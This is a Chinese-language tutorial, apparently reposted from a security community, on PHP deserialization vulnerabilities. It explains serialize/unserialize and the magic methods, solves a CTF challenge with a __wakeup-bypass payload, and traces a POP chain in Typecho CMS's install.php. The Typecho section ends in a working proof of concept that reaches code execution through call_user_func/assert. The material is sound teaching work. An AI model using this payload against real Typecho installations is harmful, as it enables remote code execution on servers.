反序列化详解&实战

本文已经首发在先知社区https://xz.aliyun.com/t/7023

反序列化漏洞

[TOC]

漏洞简介

1.1 什么是反序列化漏洞

利用程序已有的一些函数在参数中注入一些代码,达到代码执行的效果。

1.2 漏洞危害

攻击者可以利用反序列化漏洞,通过构造恶意请求报文远程执行命令,危害较大。

漏洞原理

2.1 序列化与反序列化

在了解反序列化漏洞之前,必须要先了解什么序列化、反序列化以及它们各有什么用。

2.1.1 序列化

PHP语言为例子,在写程序尤其是写网站的时候,经常会构造,并且有时候会将实例化的类作为变量进行传输。序列化就是在此为了减少传输内容的大小孕育而生的一种压缩方法。我们知道一个PHP类都含有几个特定的元素: 类属性类常量类方法。每一个类至少都含有以上三个元素,而这三个元素也可以组成最基本的类。那么按照特定的格式将这三个元素表达出来就可以将一个完整的表示出来并传递。序列化就是将一个类压缩成一个字符串的方法。

运行以下PHP代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
class userInfo
{
private $passwd = 'weak';
protected $sex = 'male';
public $name = 'ama666';

public function modifyPasswd($passwd)
{
$this->passwd = $passwd;
}

public function getPasswd()
{
echo $this->$passwd;
}
}

$ama666 = new userInfo();
$ama666->modifyPasswd('strong');
$data = serialize($ama666);
echo $data;
?>

得到的输出结果为

O:8:”userInfo”:3:{s:16:”userInfopasswd”;s:6:”strong”;s:6:”*sex”;s:4:”male”;s:4:”name”;s:6:”ama666”;}

我们来逐一解读

  • 大括号外表示为“Object”对象名称长度为8是“userInfo”,这个对象有3个属性。

  • 大括号内表示的则是这些属性的具体信息以及它们的值。

根据属性的权限不同,在序列化中的表示方法也有所不同。可以看出在代码中三个属性的权限分别是privateprotectedpublic。这里简单说一下:

  • public权限就是正常的变量权限,一般声明的变量权限均为public
  • protected权限是私有权限,即只能在类内使用,子类可以继承这个变量
  • private权限也是私有权限,比protected权限更似有一些,只能在本类内使用,子类不能继承

可以看到代码中三个变量对应的三个权限在序列化字符串中都有不同的表达,红色是private,前面加上了本类名称;

蓝色是protected,前面加上了星号,绿色是public,没有任何前缀。

总结来说一个类经过序列化之后存储在字符串的信息只有类名称和类内属性键值对,序列化字符串中没有将类方法一并序列化。这就引申出了本次讨论的主题,反序列化漏洞。

2.1.2 反序列化

反序列化与序列化相对应的,就是将含有类信息的序列化过的字符串“解压缩”还原成类。

如上图所示,将字符串反序列化出来之后的类不包含任何类方法,那么这样一个类怎么起作用呢?

反序列化的类想要使用原先的类方法必须依托于,脱离了域的反序列的类是无法调用序列化之前的类方法的。比如我在上一段代码结尾加上如下代码

1
2
3
4
<?php
$new_ama666 = unserialize($data);
$new_ama666->getPasswd();
?>

看到成功执行了类方法。如果我同样将之前序列化字符串作为输入,在一个新的域下执行以上代码片段

1
2
3
4
5
<?php
$data = "O:8:\"userInfo\":3:{s:16:\"userInfopasswd\";s:6:\"strong\";s:6:\"*sex\";s:4:\"male\";s:4:\"name\";s:6:\"ama666\";}";
$new_ama666 = unserialize($data);
$new_ama666->getPasswd();
?>

提示的是没有这个函数。总结来说反序列化漏洞可控的是要被反序列化的字符串,具体能够走多远还要依靠类方法。

2.2 PHP魔法函数

到目前为止我们可以控制类属性,但还称不上漏洞,只能说是反序列化的特性,还要配合上特定函数才能发挥反序列化漏洞的威力。所以要先了解一些特殊的函数,这些函数都是我们在利用反序列化漏洞时候的好帮手,因为这些魔术方法均可以在一些特定的情况下自动触发。如果这些魔术方法中存在我们想要执行,或者说可以利用的函数,那我们就能够进一步进行攻击。

2.2.1 __wakeup()

在php中如果需要进行反序列化,会先检查类中是否存在__wakeup()函数,如果存在,则会先调用此类方法,预先准备对象需要的资源。举例来说

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
class example
{
public $color = 'black';

public function __wakeup()
{
$this->color = 'white';
}

public function printColor()
{
echo $this->color . PHP_EOL;
}
}

$ama666 = new example;
$data = serialize($ama666);
$new_ama666 = unserialize($data);
$new_ama666->printColor();
?>

运行以上代码,结果如下,看到类属性color已经被__wakeup()函数自动调用并修改了。

这种函数被称为PHP魔法函数,会在一定条件下不需要调用而自动调用。

2.2.2 __destruct()

此魔法函数会在对象的所有引用都被删除或者类被销毁的时候自动调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class example
{
public $color = 'black';

public function __destruct()
{
echo "__destruct()" . PHP_EOL;
}

}
echo "initializing..." . PHP_EOL;
$ama666 = new example;
echo "serializing..." . PHP_EOL;
$data = serialize($ama666);
?>

执行以上代码,看到在序列化类的时候,__destruct()函数自动执行了。

2.2.3 __construct()

此函数会在创建一个类的实例时自动调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
class example
{
public $color = 'black';

public function __construct()
{
echo "__construct()" . PHP_EOL;
}

}
echo "initializing..." . PHP_EOL;
$ama666 = new example;
echo "serializing..." . PHP_EOL;
$data = serialize($ama666);
?>

执行以上代码,看到类在序列化之前,实例化的时候__construct()函数就被调用了。

2.2.4 __toString()

此魔法函数会在类被当作字符串的时候调用。在PHP5.2以前,__toString函数只有在echo、print时才生效;PHP5.2以后则可以在任何字符串环境生效(例如通过 printf,使用 %s 修饰符),但不能用于非字符串环境(如使用 %d 修饰符)。自 PHP 5.2.0 起,如果将一个未定义 __toString() 方法的对象转换为字符串,会产生 E_RECOVERABLE_ERROR 级别的错误。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
class example
{
public $color = 'black';

public function __toString()
{
return "__toString()" . PHP_EOL;
}

}
echo "initializing..." . PHP_EOL;
$ama666 = new example;
echo "echo..." . PHP_EOL;
echo $ama666;
echo "serializing..." . PHP_EOL;
$data = serialize($ama666);

?>

执行以上代码,当实例化对象被当作字符串使用的时候,__toString()函数自动调用。

还有一些不太容易想到的情况也能触发此函数

  • 反序列化对象与字符串连接时
  • 反序列化对象参与格式化字符串时
  • 反序列化对象与字符串进行==比较时(PHP进行==比较的时候会转换参数类型)
  • 反序列化对象参与格式化SQL语句,绑定参数时
  • 反序列化对象在经过php字符串函数,如 strlen()、addslashes()时
  • 在in_array()方法中,第一个参数是反序列化对象,第二个参数的数组中有toString返回的字符串的时候toString会被调用
  • 反序列化的对象作为 class_exists() 的参数的时候

2.2.5 __get()

在读取不可访问的属性值的时候,此魔法函数会自动调用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
class example
{
private $color = 'black';

public function __get($color)
{
return "__get()" . PHP_EOL;
}

}
$ama666 = new example;
echo $ama666->color;
?>

执行以上代码,因为试图访问私有变量color导致__get()函数自动调用。

2.2.6 __call()

__call是调用未定义的方法时调用的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
class example
{
private $color = 'black';

public function __call($function,$parameters)
{
echo $function."(".$parameters.")".PHP_EOL;
return "__call()" . PHP_EOL;
}

}
$ama666 = new example;
echo $ama666->notExistFunction("patameters");
?>

执行以上代码,__call()函数被调用。也就是说,你想要调用方法未定义,那么这个方法名就会作为__call的第一个参数传入,而此不存在方法的参数会被装进数组中作为__call的第二个参数传入

2.2.7

当然PHP中还有很多魔术方法没有介绍,前面只说了我认为在反序列化漏洞中比较重要的几个,其他的大家有兴趣可以自己去了解。

CTF中的反序列化

3.1 题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
class SoFun{
protected $file='index.php';
function __destruct(){
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
else{
die('Wrong filename.');
}
}
function __wakeup()
{
$this-> file='index.php';
}
public function __toString()
{
return '' ;
}
}
if (!isset($_GET['file'])) {
show_source('index.php');
}
else {
$file=base64_decode( $_GET['file']);
echo unserialize($file );
}
?> #<!--key in flag.php-->

3.2 解答

这道题利用的是PHP反序列化的一个特性,序列化字符串的结构在前面已经说过,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。此题的解题思路就是如此,通过改写序列化字符串中表示属性个数的数字,使其比真实值大,就可以跳过__wakeup()函数。

POC
1
2
3
4
5
6
7
<?php
class SoFun{
protected $file='flag.php';
}
$poc = new SoFun;
echo serialize($poc);
?>

将输出的结果表示属性个数的数字加一

1
O:5:"SoFun":2:{s:7:"*file";s:8:"flag.php";}

注意提交的时候需要base64

CMS实战

选取的是typecho CMS进行实战演示。

4.1 CMS介绍

Typecho基于PHP5开发,支持多种数据库,是一款内核强健﹑扩展方便﹑体验友好﹑运行流畅的轻量级开源博客程序。

4.2 CMS安装

访问install.php按照网站提示安装即可

4.3 漏洞成因

在根目录下的install.php文件第232行,调用了unserialize函数。传入参数是通过类方法获取的,跟进Typecho_Cookie::get方法

在文件Cookie.php中的第83行定义了类方法,功能为获取指定的Cookie值。第86行看出此值是从Cookie中获取,没有的话就从POST中获取,一步传入了unserialize函数,没有经过过滤,故而反序列化漏洞存在。

到此我们找到了输入点,但是具体能够执行什么类型的攻击以及攻击深度还要取决了类的作用域以及其中的函数。按照思路我们希望构造一个Typecho中已经存在的类,这个类要满足以下条件

  • 有魔法函数,能够在程序正常逻辑中自动执行
  • 魔法函数中存在敏感函数,通过向类属性注入可以代码可以被敏感函数执行,从而达到攻击效果。

那么接下来的任务就是要寻找符合以上要求的类。首先Typecho_Cookie这个类是不符合要求的,在install.php文件中接着向下看,第234行实例化了Typecho_Db,跟进看一看这个类的定义。在文件Db.php中发现此类具有__construct()魔法函数,在此方法的第120行将传入的参数当作字符串进行拼接。传入的参数$adapterName如果是我们可控的参数的话,根据前面所讲,此过程会自动触发__toString()魔法函数。

回到上一层,也就是实例化Typecho_Db那里,看到$adapterName实际上就是Typecho_Cookie的一个类属性。而我们已知此类属性是可控的,那么下一步的目标就变成了

  • 找到一个类,其中含有__toString()魔法函数,能够在程序正常逻辑中自动执行
  • 此魔法函数中含有敏感函数可以被利用

Feed.php文件中找到了符合上述条件的类Typecho_Feed,其中__toString()方法中在第290行将$item['author']->screenName作为参数传递给了函数htmlspecialchars,前面讲过,当类试图访问一个不存在或者不可访问的对象是会触发__get()魔法函数。换句话说如果$item['author']是一个类且其中并不存在类属性screenName的话就会触发这个类($item['author'])的__get()魔法函数。

现在我们的目标变成了

  • 找到一个类,其中含有__get()魔法函数,能够在程序正常逻辑中自动执行
  • 此魔法函数中含有敏感函数可以被利用

在文件Requests.php文件中找到了符合要求的类Typecho_Requests,在文件第270行找到了__get()魔法函数

跟进函数get,注意此函数并非魔法函数,而是类方法。在文件的第296行找到了此函数的定义,此函数最后一行调用了_applyFilter函数,继续跟进,在文件第159行找到了此函数的定义,其中的第164行调用了call_user_func,是一个危险函数可以使用命令执行漏洞来攻击。

到此为止我们从入口一路向下,终于找到了可以利用的敏感函数,总结回顾一下。

  1. 反序列化Typecho_Cookie类方法获得的变量,此处为输入点,可以输入可控的序列化字符串
  2. 实例化Typecho_Db,触发其中的construct魔法函数,其中有一段将类作为字符串拼接
  3. 在Typecho_Feed类中找到toString魔法函数,其中有访问不可访问属性的操作
  4. 在Typech_Requests类中找到get魔法函数,两步调用了call_user_func函数,可以命令执行

根据pop链可以构造POC如下

POC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
class Typecho_Feed{
private $_type='ATOM 1.0';
private $_items;

public function __construct(){
$this->_items = array(
'0'=>array(
'author'=> new Typecho_Request())
);
}
}

class Typecho_Request{
private $_params = array('screenName'=>'phpinfo()');
private $_filter = array('assert');
}
$poc = array(
'adapter'=>new Typecho_Feed(),
'prefix'=>'typecho');

echo base64_encode(serialize($poc));
?>

防御方法

5.1 过滤用户输入

可以维护一个黑名单或者白名单来限制用户的输入,过滤不合理,不符合程序逻辑的输入。

5.2 Java

参考文章浅谈Java反序列化漏洞修复方案